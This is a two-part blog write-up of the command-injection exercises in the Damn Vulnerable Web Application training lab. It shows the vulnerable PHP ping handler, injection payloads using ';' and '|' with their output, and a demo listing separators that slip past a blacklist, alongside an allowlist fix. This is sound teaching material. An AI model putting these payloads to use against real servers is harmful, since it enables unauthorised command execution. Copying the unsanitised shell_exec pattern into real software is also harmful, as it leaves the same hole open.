Command Execution Part 2…
Hey guys,
So I finally got around to playing with the Damn Vulnerable Web Application on Medium level. The command execution level really only adds a blacklist of two tokens (';' and '&&') as the "more secure" version of the Low setting. Let's take a look at the code:
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'ip' ];
// Remove any of the characters in the array (blacklist).
// Note: this is a blacklist of two substrings, applied once each with str_replace.
$substitutions = array(
'&&' => '',
';' => '',
);
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// Determine OS and execute the ping command.
// $target is still concatenated straight into the shell command line.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
As you can see, they have added a blacklist filter that strips the following two tokens: ';' and '&&' (note that '&&' is a two-character sequence, not a single character). The code that does this is here:
$substitutions = array(
'&&' => '',
';' => '',
);
Well, what about the plethora of other shell metacharacters, eh? Such as... well, you guessed it, the famous pipe operator '|', which is not in the blacklist at all. Let's see what happens when we try using it:
I entered "127.0.0.1 | ls -l" (however, you could just enter "| ls -l"), and I got back:
total 12
drwxr-xr-x 2 www-data www-data 4096 Feb 17 15:17 help
-rw-r--r-- 1 www-data www-data 1509 Feb 17 15:17 index.php
-rw-r--r-- 1 www-data www-data 0 Jun 9 08:37 ls
drwxr-xr-x 2 www-data www-data 4096 Feb 17 15:17 source
Voilà!
Command Execution Part 1
Hey,
So the next part of the Damn Vulnerable Web Application is entitled "Command Execution", which is a very, very simple and contrived example. Let's take a look at the source code behind it:
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
So, as you can see clear as day, there is no sanitization of the user-supplied $target variable before it is concatenated into the shell command line passed to shell_exec(), so the trick here is very simple:
127.0.0.1; ls -lart; uname -ar; whoami; who;
Will return:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.080 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.241 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.241 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2011ms
rtt min/avg/max/mdev = 0.080/0.187/0.241/0.076 ms
total 20
drwxr-xr-x 2 www-data www-data 4096 Feb 17 15:17 source
-rw-r--r-- 1 www-data www-data 1509 Feb 17 15:17 index.php
drwxr-xr-x 2 www-data www-data 4096 Feb 17 15:17 help
drwxr-xr-x 10 www-data www-data 4096 Feb 17 15:17 ..
drwxr-xr-x 4 www-data www-data 4096 Jun 3 13:38 .
Linux dojo-vm 2.6.31-19-generic #56-Ubuntu SMP Thu Jan 28 01:26:53 UTC 2010 i686 GNU/Linux
www-data
dojo tty7 Jun 2 14:51 (:0)
dojo pts/0 Jun 2 15:50 (:0.0)
dojo pts/1 Jun 2 18:36 (:0.0)
Well that one was easy, wasn’t it?
Also note that you can use && to chain commands on the command line as well as ;. The difference is that && only runs the second command if the first one succeeds, whereas ; runs it regardless of the first command's exit status.
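Putting the two posts together (no sanitization at all in Part 1, a two-entry blacklist in Part 2), here is an added example, not DVWA's own source, that reproduces the Medium-level filter so you can see offline exactly which separators survive it, side by side with the allowlist fix a developer should ship instead. The helper names (medium_blacklist, is_valid_ip, build_ping_command) and the payload list are my own constructions.

```php
<?php
// Added example (not DVWA's code): reproduces the Medium-level blacklist so
// it can be probed offline, then shows an allowlist-based replacement for the
// ping handler from Parts 1 and 2. All input strings below are constructed.

// The two-entry blacklist from the Medium-level source, same effect as DVWA's.
function medium_blacklist(string $target): string
{
    $substitutions = array('&&' => '', ';' => '');
    return str_replace(array_keys($substitutions), $substitutions, $target);
}

// Allowlist check: the only thing a ping target should ever be is an IP
// literal, so accept exactly that and nothing else.
function is_valid_ip(string $target): bool
{
    return filter_var($target, FILTER_VALIDATE_IP) !== false;
}

// Hardened command builder. Returns null (the caller should refuse the
// request) when the target fails validation. escapeshellarg() is belt and
// braces: whatever reaches /bin/sh is always one single-quoted word.
function build_ping_command(string $target): ?string
{
    if (!is_valid_ip($target)) {
        return null;
    }
    $arg = escapeshellarg($target);
    if (stristr(php_uname('s'), 'Windows NT')) {
        return 'ping ' . $arg;
    }
    return 'ping -c 3 ' . $arg;
}

// Constructed inputs: two legitimate targets and the separators a player
// would try against the Medium level. Comments say what the blacklist leaves.
$inputs = array(
    '127.0.0.1',            // legitimate
    '::1',                  // legitimate (IPv6)
    '127.0.0.1; ls -l',     // ';' stripped: "ls -l" become extra ping args
    '127.0.0.1 && ls -l',   // '&&' stripped: same, nothing is injected
    '127.0.0.1 | ls -l',    // survives: '|' is not in the list
    '127.0.0.1 || ls -l',   // survives: '||' is not in the list either
    "127.0.0.1\nls -l",     // survives: a newline separates commands too
    '127.0.0.1 `id`',       // survives: backtick command substitution
    '127.0.0.1 $(id)',      // survives: $() command substitution
    '127.0.0.1 &;& ls -l',  // survives: str_replace runs once per token, so
                            // removing ';' from '&;&' leaves '&&' behind
);

foreach ($inputs as $input) {
    $filtered = medium_blacklist($input);
    $cmd = build_ping_command($input);
    printf(
        "%-26s after blacklist: %-26s allowlist: %s\n",
        json_encode($input),
        json_encode($filtered),
        $cmd === null ? 'REJECTED' : $cmd
    );
}
```

Run it with `php filter-demo.php`. Every injected input is rejected by the allowlist, while the blacklist only catches the two forms the author of the Medium level thought of; the '&;&' line is worth a second look because it turns the filter's own single-pass str_replace against it. Note that escapeshellarg() on its own is not a complete fix (a target starting with '-' would still be parsed by ping as an option), which is why the IP validation comes first; in a real application you would avoid shelling out for this at all.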